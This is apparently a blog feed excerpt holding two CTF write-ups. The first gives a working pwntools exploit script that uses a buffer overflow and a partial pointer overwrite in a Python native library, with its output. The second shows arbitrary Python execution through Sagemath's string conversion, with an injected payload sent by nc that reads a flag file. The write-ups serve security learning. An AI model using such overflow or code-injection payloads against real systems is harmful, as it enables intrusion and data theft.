0x00007fdc2680125a &lt;+154&gt;</span>: mov rax,QWORD PTR <span class="o">[</span>rbp-0x10] <span class="gp"> 0x00007fdc2680125e &lt;+158&gt;</span>: mov rsi,rax <span class="gp"> 0x00007fdc26801261 &lt;+161&gt;</span>: mov rax,QWORD PTR <span class="o">[</span>rip+0x2d88] <span class="c"># 0x7fdc26803ff0</span> <span class="gp"> 0x00007fdc26801268 &lt;+168&gt;</span>: mov rdi,rax <span class="gp"> 0x00007fdc2680126b &lt;+171&gt;</span>: call 0x7fdc26801090 <span class="gp"> 0x00007fdc26801270 &lt;+176&gt;</span>: mov rsi,QWORD PTR <span class="o">[</span>rbp-0x8] <span class="gp"> 0x00007fdc26801274 &lt;+180&gt;</span>: xor rsi,QWORD PTR fs:0x28 <span class="gp"> 0x00007fdc2680127d &lt;+189&gt;</span>: je 0x7fdc26801284 &lt;encrypt+196&gt; <span class="gp"> 0x00007fdc2680127f &lt;+191&gt;</span>: call 0x7fdc268010a0 <span class="gp"> 0x00007fdc26801284 &lt;+196&gt;</span>: leave <span class="gp"> 0x00007fdc26801285 &lt;+197&gt;</span>: ret <span class="go">End of assembler dump. gef➤ </span></code></pre></div></div> <p>Additionally, the <code class="language-plaintext highlighter-rouge">print_flag</code> function is only a few bytes away from the <code class="language-plaintext highlighter-rouge">encrypt</code> function. Hence, we can perform a partial one-byte overwrite to coerce calls to the <code class="language-plaintext highlighter-rouge">encrypt</code> function to run the <code class="language-plaintext highlighter-rouge">print_flag</code> function instead. Since it only requires one byte, we can either encode the input properly as UTF-8 or hope that the single byte we need to write is valid UTF-8 itself.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ p print_flag </span><span class="gp">$</span>4 <span class="o">=</span> <span class="o">{</span>void <span class="o">()}</span> 0x7fdc268011a0 &lt;print_flag&gt; <span class="go">gef➤ p encrypt - print_flag </span><span class="gp">$</span>5 <span class="o">=</span> 0x20 <span class="go">gef➤ </span></code></pre></div></div> <p>It turns out that it is valid without requiring further encoding. The script to perform this one-byte overwrite is as follows:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"challs.sieberrsec.tech"</span><span class="p">,</span> <span class="mi">3477</span><span class="p">)</span> <span class="c1"># p = process(["python", "tfc.py"]) </span> <span class="c1"># Calculate the partial byte to overwrite. </span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"turbofastcrypto.cpython-38-x86_64-linux-gnu.so"</span><span class="p">)</span> <span class="n">to_overwrite</span> <span class="o">=</span> <span class="n">xor</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"print_flag"</span><span class="p">])[</span><span class="mi">0</span><span class="p">],</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"encrypt"</span><span class="p">])[</span><span class="mi">0</span><span class="p">])</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Overwriting with byte {}.'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">to_overwrite</span><span class="p">))))</span> <span class="k">assert</span> <span class="n">to_overwrite</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Confirmed that the byte is valid UTF-8.'</span><span class="p">)</span> <span class="c1"># Overwrite a single byte of the `ml_meth` pointer of a `PyMethodDef` structure in `mtds`. </span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt;'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'A'</span><span class="o">*</span> <span class="p">(</span><span class="mi">64</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="n">to_overwrite</span><span class="p">)</span> <span class="c1"># Trigger the overwritten encrypt call to get the flag. </span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">()</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">flag</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="s">'Flag: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">flag</span><span class="p">))</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>Running the script finally gives us the flag:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python exploit_partial.py <span class="go">[+] Opening connection to challs.sieberrsec.tech on port 3477: Done [*] '/vagrant/sieberrsec/tfc/distrib_turbofastcrypto_old/turbofastcrypto.cpython-38-x86_64-linux-gnu.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] Overwriting with byte 0x60. [*] Confirmed that the byte is valid UTF-8. [+] Flag: IRS{w@s_th@t_fun?} [*] Closed connection to challs.sieberrsec.tech port 3477 </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">IRS{w@s_th@t_fun?}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: An insecurely implemented Python native library allows for an attacker to exfiltrate the XOR key used to ‘encrypt’ arbitrary data as well as contains an unbounded buffer overflow on the encryption buffer allowing partial overwrite of the ml_meth pointer of a PyMethodDef structure to trigger a win function.

2021-12-20T00:00:00+08:002021-12-20T00:00:00+08:00https://nandynarwhals.org/hxp-ctf-2021-brieman<p>Summary: Sagemath contains sinks that allow for the arbitrary execution of Python code when converting from user input to math objects.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>brie man by yyyyyyy misc Difficulty estimate: easy - easy Points: round(1000 · min(1, 10 / (9 + [39 solves]))) = 208 points Description: Do you ever dream of solving a famous open question? (Now that we have your attention: Sorry, this challenge has nothing to do with Brie. 🧀) Download: brie man-b6db7372d539e8b7.tar.xz (13.5 KiB) Connection (mirrors): nc 65.108.178.230 7904 </code></pre></div></div> <p>Attachment: <a href="https://nandynarwhals.org/assets/files/hxp-2021/brie man-b6db7372d539e8b7.tar.xz">challenge file</a></p> <h2 id="solution">Solution</h2> <p>The following sage file is given. It appears to want us to find a counterexample to the Riemann Hypothesis, one of the math problems included in the <a href="https://www.claymath.org/millennium-problems/riemann-hypothesis">Millenium Prizes</a>. It can surmised we’re not supposed to actually find a counterexample.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env sage </span><span class="kn">import</span> <span class="nn">re</span> <span class="k">if</span> <span class="n">sys</span><span class="p">.</span><span class="n">version_info</span><span class="p">.</span><span class="n">major</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">'nope nope nope nope | https://hxp.io/blog/72'</span><span class="p">)</span> <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span> <span class="n">rx</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="sa">r</span><span class="s">'Dear Bernhard: Your conjecture is false, for ([^ ]{,40}) is a counterexample\.'</span><span class="p">)</span> <span class="n">s</span> <span class="o">=</span> <span class="n">CC</span><span class="p">.</span><span class="n">to_prec</span><span class="p">(</span><span class="mi">160</span><span class="p">)(</span><span class="n">rx</span><span class="p">.</span><span class="n">match</span><span class="p">(</span><span class="nb">input</span><span class="p">()).</span><span class="n">groups</span><span class="p">()[</span><span class="mi">0</span><span class="p">])</span> <span class="n">r</span> <span class="o">=</span> <span class="nb">round</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">real</span><span class="p">())</span> <span class="k">assert</span> <span class="ow">not</span> <span class="nb">all</span><span class="p">((</span><span class="n">s</span><span class="o">==</span><span class="n">r</span><span class="p">,</span> <span class="n">r</span><span class="o">&lt;</span><span class="mi">0</span><span class="p">,</span> <span class="n">r</span><span class="o">%</span><span class="mi">2</span><span class="o">==</span><span class="mi">0</span><span class="p">))</span> <span class="c1"># boring </span> <span class="k">assert</span> <span class="ow">not</span> <span class="n">s</span><span class="p">.</span><span class="n">real</span><span class="p">()</span> <span class="o">==</span> <span class="mi">1</span><span class="o">/</span><span class="mi">2</span> <span class="c1"># boring </span> <span class="k">assert</span> <span class="n">zeta</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="c1"># uhm ok </span><span class="k">print</span><span class="p">(</span><span class="nb">open</span><span class="p">(</span><span class="s">'flag.txt'</span><span class="p">).</span><span class="n">read</span><span class="p">().</span><span class="n">strip</span><span class="p">())</span> </code></pre></div></div> <p>Furthermore, the <a href="https://hxp.io/blog/72">link</a> printed when Python 2 is detected also gives us a clue that we may need to look for an arbitrary Python code evaluation sink.</p> <p>Experimenting with <code class="language-plaintext highlighter-rouge">CC.to_prec(160)</code> shows that it converts strings to complex fields.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">sage: CC.to_prec(160)("1.0") 1.0000000000000000000000000000000000000000000000 </span></code></pre></div></div> <p>It appears to perform arithmetic and attempt to resolve Python symbols.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">sage: CC.to_prec(160)("1 + 1") 2.0000000000000000000000000000000000000000000000 sage: CC.to_prec(160)("A") </span><span class="c">... </span><span class="gp">/var/tmp/sage-9.4-current/local/lib/python3.9/site-packages/sage/all.py in &lt;module&gt;</span><span class="w"> </span><span class="go"> NameError: name 'A' is not defined </span></code></pre></div></div> <p>Attempting some Python code results in it actually executing.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">sage: CC.to_prec(160)("print('hello world')") helloworld NaN + NaN*I sage: </span></code></pre></div></div> <p>Thus, the flag read code can be simply provided to obtain the flag:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>nc 65.108.178.230 7904 <span class="go">Dear Bernhard: Your conjecture is false, for print(open('flag.txt').read().strip()) is a counterexample. hxp{0NE_M1LL10N_D0LLAR5} </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">hxp{0NE_M1LL10N_D0LLAR5}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: Sagemath contains sinks that allow for the arbitrary execution of Python code when converting from user input to math objects.